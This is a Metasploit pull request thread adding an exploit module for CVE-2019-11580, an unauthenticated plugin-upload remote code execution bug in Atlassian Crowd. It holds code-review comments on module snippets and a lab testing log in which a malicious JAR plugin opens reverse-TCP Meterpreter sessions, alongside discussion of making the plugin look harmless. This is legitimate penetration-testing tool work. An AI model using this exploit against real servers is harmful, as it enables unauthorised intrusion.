Push up working CVE-2019-11580 exploit and associated documentation
rapid7/metasploit-framework pull request #15501
Opened 2021-07-30 17:11 UTC by gwillcox-r7

After reading the advisory from CISA at https://us-cert.cisa.gov/ncas/alerts/aa21-209a I noticed we didn't have an exploit for CVE-2019-11580 even though its a pretty simple bug that allows one to upload arbitrary plugins to vulnerable Atlassian Crowd data servers and gain unauthenticated RCE on these servers via two relatively simple HTTP requests.

This PR adds in support for exploiting CVE-2019-11580 and also checking if a target is vulnerable to CVE-2019-11580. The check may need further improvements however the exploit works reliably in my experience.

## Verification

List the steps needed to make sure this thing works

- [ ] Follow the steps in `Vulnerable Application` section of the documentation to set up a vulnerable target
- [ ] `use exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce`
- [ ] Set `RHOST` to the target IP
- [ ] Set `LHOST` to your local IP
- [ ] `exploit`
- [ ]  You should get a shell back as the user running the Atlassian Crowd application.

2021-07-30 18:09 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/crowd/'])
```suggestion
        OptString.new('TARGETURI', [true, 'The base URI to Crowd', '/crowd/'])
```

2021-07-30 18:12 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
Were you going to use `Rex::MIME::Message`?

2021-07-30 18:14 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
Also, `file_cdl` should be changed to `file_ tekwizz123`, at least. :-)

2021-07-30 18:15 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
Also, `file_cdl` should be changed to `file_tekwizz123`, at least. :-)

2021-07-30 18:19 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +  include Msf::Exploit::EXE
I don't think this is being used.

2021-07-30 18:20 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        'Platform' => %w[java],
Top-level `Arch`, too, please.

2021-07-30 18:23 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
And you can use `ctype` for `Content-Type`.

2021-07-30 18:24 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        'Platform' => %w[java],
```
       Name: Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
     Module: exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce
   Platform: Java
       Arch:
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-05-22
```

2021-07-30 18:26 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    print_status('Sending a test request to try install an invalid plugin to see if the server is vulnerable...')
```suggestion
    print_status('Sending a test request to try installing an invalid plugin to see if the server is vulnerable...')
```

2021-07-30 18:26 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +      return CheckCode::Vulnerable("Target responded that it couldn't install a invalid plugin, indicating its vulnerable!")
```suggestion
      return CheckCode::Vulnerable("Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!")
```

2021-07-30 18:27 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so its not vulnerable!")
```suggestion
    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
```

2021-07-30 18:30 UTC, wvu-r7 requested changes
Overall pretty good job!

2021-07-30 18:54 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
No file cleanup?

2021-07-30 18:57 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
> +### Atlassian Crowd 3.0.3 on Windows 10 20H2
Was this tested on Linux? There's an [official Docker image](https://hub.docker.com/r/atlassian/crowd).

2021-07-30 19:11 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +      )
```suggestion
    )
```

2021-07-30 19:14 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
And string interpolation is preferred over concatenation.

2021-07-30 20:09 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
Yep makes sense I took most of this from a similar module that uploads plugins to Jira so probably ways to improve it, thanks for pointing these out :)

2021-07-30 20:10 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +  include Msf::Exploit::EXE
Yeahhhh I have no idea why thats in here either; came with the previous JIRA module that I based this off of and even there I'm not sure why its included. Missed my to-do list when I was cleaning up this module, let me resolve that.

2021-07-30 20:11 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        'Platform' => %w[java],
Eeek good spotting!

2021-07-30 20:12 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
Didn't find one from the original PoC. I imagine it may be possible but at that point it would require an unauthenticated plugin removal bug so either way this will require additional research.

2021-07-30 20:12 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        'Platform' => %w[java],
It's a common gotcha. No worries. cc @adfoster-r7

2021-07-30 20:13 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
> +### Atlassian Crowd 3.0.3 on Windows 10 20H2
Hmm no I did try installing it on Linux but ran into some issues, I'll try the Docker image though 👍

2021-07-30 20:13 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        'Platform' => %w[java],
IOW, it won't "absorb" platform and arch from targets.

2021-07-30 20:14 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +      )
Weird I don't know why rubocop didn't point this out. Bad rubocop. No treats today.

2021-07-30 20:17 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
Also true so it does just expect `file_XXXX` as noted at https://www.corben.io/atlassian-crowd-rce/ which shows the source code so I'll randomize that. Also agree on the `ctype` part, good callout. As for `Rex::MIME::Message`, I just copied this format as a TON of other modules use it but I agree that may be a better method to approaching this.

2021-07-30 20:26 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
Also for reference I don't think you can remove the plugin file once the plugin is running so you would have to stop the server, delete a bunch of files and change configs, and then you would be able to get things running again. Haven't tried this yet but I did notice it wasn't possible to delete the plugin file whilst the server was running.

2021-07-30 20:30 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
A ton of modules might not know better. :-)

2021-07-30 20:38 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
Right, but this is a Metasploit module, not a PoC.

2021-07-30 20:46 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/crowd/'])
Resolved in https://github.com/rapid7/metasploit-framework/pull/15501/commits/27f70af1b39b9b49452f727208975ed1ef518423

2021-07-30 20:46 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +  include Msf::Exploit::EXE
Resolved in https://github.com/rapid7/metasploit-framework/pull/15501/commits/27f70af1b39b9b49452f727208975ed1ef518423

2021-07-30 20:46 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    print_status('Sending a test request to try install an invalid plugin to see if the server is vulnerable...')
Resolved in https://github.com/rapid7/metasploit-framework/pull/15501/commits/27f70af1b39b9b49452f727208975ed1ef518423

2021-07-30 20:46 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +      return CheckCode::Vulnerable("Target responded that it couldn't install a invalid plugin, indicating its vulnerable!")
Resolved in https://github.com/rapid7/metasploit-framework/pull/15501/commits/27f70af1b39b9b49452f727208975ed1ef518423

2021-07-30 20:48 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +      )
Resolved in https://github.com/rapid7/metasploit-framework/pull/15501/commits/27f70af1b39b9b49452f727208975ed1ef518423

2021-07-30 20:48 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so its not vulnerable!")
Resolved in https://github.com/rapid7/metasploit-framework/pull/15501/commits/27f70af1b39b9b49452f727208975ed1ef518423

2021-07-30 20:50 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
Further examination and shaking of the magic 8 ball shows that I'm an idiot and `Rex::MIME::Message` is actually pretty commonly used like it should be. Also as mentioned already this should be upgraded to use `Rex::MIME::Message` so long.

2021-07-30 20:50 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
That might be a Windows thing, btw.

2021-07-30 20:52 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
IOW, it might be fine to delete on Linux, etc.

2021-07-30 20:54 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
It's fine. Lots of APIs are shrouded in mystery!

2021-07-30 20:59 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    [contents, name]
I like how you composed the JAR-based plugin here. I would have done something similar.

2021-07-30 21:00 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
> +### Atlassian Crowd 3.0.3 on Windows 10 20H2
Would be a good idea, since this is in `multi`, and Linux is a common platform.

2021-07-30 21:17 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    [contents, name]
Oh, this is from [exploit/multi/http/jira_plugin_upload](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jira_plugin_upload.rb).

2021-07-30 21:18 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    [contents, name]
Credits go to the previous modules that show me how this syntax was done; was looking for a way to make things more generic and stumbled onto this code whilst looking through similar plugins. The major downside I see though is that it requires us to put the string `metasploit` and `PayloadServlet.class` into our code given how `payload.encoded_jar` works. Wish there was a way to randomize these strings since is _super_ obvious to anyone looking at the JAR file that something fishy is going on.

2021-07-30 21:20 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        'Platform' => %w[java],
Leaving this issue open for @adfoster-r7 to examine, however it was resolved with https://github.com/rapid7/metasploit-framework/pull/15501/commits/27f70af1b39b9b49452f727208975ed1ef518423

2021-07-30 21:20 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
> +### Atlassian Crowd 3.0.3 on Windows 10 20H2
Agreed, will test it out there and update details.

2021-07-30 21:33 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
Resolved with https://github.com/rapid7/metasploit-framework/pull/15501/commits/75d19c11abdb0ec2b386174be236444f91ab2d7c

2021-07-30 21:53 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +      return CheckCode::Vulnerable("Target responded that it couldn't install a invalid plugin, indicating it's vulnerable!")
```suggestion
      return CheckCode::Vulnerable("Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!")
```

This hasn't been corrected yet. :)

2021-07-30 21:55 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
If you're going to use explicit `return`, please use it consistently.

2021-07-30 21:59 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
https://github.com/rapid7/metasploit-framework/pull/15501#discussion_r680142570

2021-07-30 22:14 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
RuboCop prefers implicit return where possible so I'll make the necessary adjustments to make this implicit.

2021-07-30 22:55 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
> +1. Update the `PATH` environent variable to include a path to the same location as `JAVA_HOME`, but with `\bin` at the end of it.
```suggestion
1. Update the `PATH` environment variable to include a path to the same location as `JAVA_HOME`, but with `\bin` at the end of it.
```

2021-07-30 22:57 UTC, wvu-r7 requested changes
I think that's all I've got for a first-pass review. Nice job addressing these comments so quickly! Do go away soon. :)

2021-08-02 16:10 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
> +1. Update the `PATH` environent variable to include a path to the same location as `JAVA_HOME`, but with `\bin` at the end of it.
Nice spotting, will fix this up 👍

2021-08-02 16:28 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
> +1. Update the `PATH` environent variable to include a path to the same location as `JAVA_HOME`, but with `\bin` at the end of it.
Fixed with https://github.com/rapid7/metasploit-framework/pull/15501/commits/0d7d5ab93f5b9bd8afcefdd1863054164922084b

2021-08-02 16:28 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    return CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
Fixed with https://github.com/rapid7/metasploit-framework/pull/15501/commits/0d7d5ab93f5b9bd8afcefdd1863054164922084b

2021-08-02 16:28 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +      return CheckCode::Vulnerable("Target responded that it couldn't install a invalid plugin, indicating it's vulnerable!")
Fixed with https://github.com/rapid7/metasploit-framework/pull/15501/commits/0d7d5ab93f5b9bd8afcefdd1863054164922084b

2021-08-02 16:30 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.md
> +### Atlassian Crowd 3.0.3 on Windows 10 20H2
Fixed with https://github.com/rapid7/metasploit-framework/pull/15501/commits/0d7d5ab93f5b9bd8afcefdd1863054164922084b

2021-08-02 16:32 UTC, gwillcox-r7 commented
@wvu-r7 last bits should now be done, I'll have to get back to you with a proper solution r.e the file deletion code though.

2021-08-02 18:19 UTC, wvu-r7 approved these changes

2021-08-05 13:41 UTC, adfoster-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
I think `ARTIFACTS_ON_DISK` should still be left here, even if we cleaned those temporary files up later - as the important part is the fact we touched the disk which might trigger A/V, or in system logs etc.

2021-08-05 13:48 UTC, adfoster-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
Is it worth making this configurable, or relying on setting an increased `HttpClientTimeout` value instead and removing this hard coded value? It looks like `HttpClientTimeout` is set to 20 by default when it's not provided by the user, but we could set it as an advanced option to set the value to something higher

2021-08-05 13:50 UTC, adfoster-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            <description>Calendar App</description>
Faker? 👀

2021-08-05 13:55 UTC, adfoster-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
```suggestion
    servlet = MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class')
```

2021-08-05 14:20 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
Hmm so truth be told I think this was just copied over, so might be good to just set this to a custom value that the user can control if needs be.

2021-08-05 14:47 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    }, 25)
Resolved with https://github.com/rapid7/metasploit-framework/pull/15501/commits/00cfdc4f175fea6eb4e231e47713418262870ca0

2021-08-05 14:48 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            <description>Calendar App</description>
Fixed with https://github.com/rapid7/metasploit-framework/pull/15501/commits/00cfdc4f175fea6eb4e231e47713418262870ca0

2021-08-05 14:48 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')
Fixed with https://github.com/rapid7/metasploit-framework/pull/15501/commits/00cfdc4f175fea6eb4e231e47713418262870ca0

2021-08-05 14:49 UTC, gwillcox-r7 commented
@adfoster-r7 Fixed the issues, feel free to verify.

2021-08-05 16:38 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            <description>Calendar App</description>
No, _Calendar App_. :P

2021-08-05 16:39 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        <atlassian-plugin key="metasploit.PayloadServlet" name="#{name}" plugins-version="2" class="metasploit.PayloadServlet">
Yeah, there's some existing randomization, but it's very far from complete, and it's not accessible through every interface.

2021-08-05 16:46 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
Correct, `ARTIFACTS_ON_DISK` should remain even if files are cleaned up.

2021-08-05 16:48 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
Correct, `ARTIFACTS_ON_DISK` should remain even if files are cleaned up. I commented on this line because it was relevant, not because I was suggesting its removal.

2021-08-05 16:55 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        'Platform' => %w[java],
@adfoster-r7

2021-08-05 16:57 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        OptInt.new('REQUESTTIMEOUT', [true, 'Max time to wait for requests to time out', 25])
Since every request uses this, why not set `HttpClientTimeout` in `DefaultOptions`?

2021-08-05 16:58 UTC, adfoster-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        OptInt.new('REQUESTTIMEOUT', [true, 'Max time to wait for requests to time out', 25])
Just to add a bit more context to my previous comment; This configurable http timeout functionality already exists as an advanced option:

https://github.com/rapid7/metasploit-framework/blob/520440e6ba8ed006d8897a72dff3a4f74619be43/lib/msf/core/exploit/remote/http_client.rb#L47

You can override it with a specific value in your module instead of adding a new custom `REQUESTTIMEOUT` option, like so:

```ruby
register_advanced_options(
      [
        OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 25])
      ]
)
```

Note that the default is already `20` when not provided set explicitly by a user or module:

https://github.com/rapid7/metasploit-framework/blob/520440e6ba8ed006d8897a72dff3a4f74619be43/lib/msf/core/exploit/remote/http_client.rb#L311-L321

2021-08-05 16:59 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    send_request_raw({
```suggestion
    send_request_cgi({
```

2021-08-05 17:00 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        OptInt.new('REQUESTTIMEOUT', [true, 'Max time to wait for requests to time out', 25])
It should probably be an advanced option, anyway.

2021-08-05 17:00 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        OptInt.new('REQUESTTIMEOUT', [true, 'Max time to wait for requests to time out', 25])
https://github.com/rapid7/metasploit-framework/pull/15501#discussion_r683630527

2021-08-05 17:02 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    send_request_raw({
I think I may have done this as the original request when using `send_request_cgi` sent some extra headers that were messing things up and causing the file upload to fail. I'll try this again but no guarentees.

2021-08-05 17:02 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    send_request_raw({
For consistency, and `send_request_cgi` is generally desirable unless `send_request_raw` is required.

2021-08-05 17:15 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    send_request_raw({
Nm, it works fine, I'll update this along with the other code 😄

2021-08-05 17:15 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    send_request_raw({
Nm, it works fine, I'll update this along with the other code 😄

2021-08-05 18:12 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +    send_request_raw({
Fixed in https://github.com/rapid7/metasploit-framework/pull/15501/commits/ade653f0bf33160c80bc7bef67f5e9af2276af7c

2021-08-05 18:12 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        OptInt.new('REQUESTTIMEOUT', [true, 'Max time to wait for requests to time out', 25])
Fixed in https://github.com/rapid7/metasploit-framework/pull/15501/commits/ade653f0bf33160c80bc7bef67f5e9af2276af7c

2021-08-05 18:12 UTC, gwillcox-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +        OptInt.new('REQUESTTIMEOUT', [true, 'Max time to wait for requests to time out', 25])
Made this an advanced option with https://github.com/rapid7/metasploit-framework/pull/15501/commits/ade653f0bf33160c80bc7bef67f5e9af2276af7c

2021-08-05 18:21 UTC, wvu-r7 approved these changes

2021-08-12 13:37 UTC, smcintyre-r7 reviewed
Successfully tested the module on both the Windows and Linux targets. In both cases the check method worked and then the module ran as expected.

<details>
<summary>Testing Output</summary>

```
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > check

[*] Sending a test request to try installing an invalid plugin to see if the server is vulnerable...
[*] 0.0.0.1:8095 - Cannot reliably check exploitability. Was not able to connect to the target!
[*] Sending a test request to try installing an invalid plugin to see if the server is vulnerable...
[+] 127.0.0.1:8095 - The target is vulnerable. Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > show options 

Module options (exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     localhost        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8095             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /crowd/          yes       The base URI to Atlassian Crowd
   VHOST                       no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > exploit
[*] Exploiting target 0.0.0.1

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending a test request to try installing an invalid plugin to see if the server is vulnerable...
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Was not able to connect to the target! "set ForceExploit true" to override check result.
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending a test request to try installing an invalid plugin to see if the server is vulnerable...
[+] The target is vulnerable. Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!
[*] Generating a malicious JAR plugin...
[*] Uploading the malicious JAR plugin...
[*] Sending stage (58082 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.2:53772) at 2021-08-12 09:04:29 -0400
[*] Session 1 created in the background.
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > set RHOSTS 192.168.159.118
RHOSTS => 192.168.159.118
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > check
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > check

[*] Sending a test request to try installing an invalid plugin to see if the server is vulnerable...
[+] 192.168.159.118:8095 - The target is vulnerable. Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > show options 

Module options (exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.118  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8095             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /crowd/          yes       The base URI to Atlassian Crowd
   VHOST                       no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending a test request to try installing an invalid plugin to see if the server is vulnerable...
[+] The target is vulnerable. Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!
[*] Generating a malicious JAR plugin...
[*] Uploading the malicious JAR plugin...
[*] Sending stage (58082 bytes) to 192.168.159.118
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.118:61924) at 2021-08-12 09:36:03 -0400

meterpreter > getuid
Server username: Spencer McIntyre
meterpreter > sysinfo
Computer    : DESKTOP-RTCRBEV
OS          : Windows 8.1 6.3 (x86)
Meterpreter : java/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.118 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce) > 

```
</details>


I'll get this landed shortly. Thanks @gwillcox-r7 !

2021-08-12 13:38 UTC, smcintyre-r7 approved these changes

2021-08-12 13:39 UTC, merged

2021-08-12 20:47 UTC, wvu-r7 commented on modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
> +            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
Thank you! Further context: https://github.com/rapid7/metasploit-framework/pull/10707#discussion_r220767224.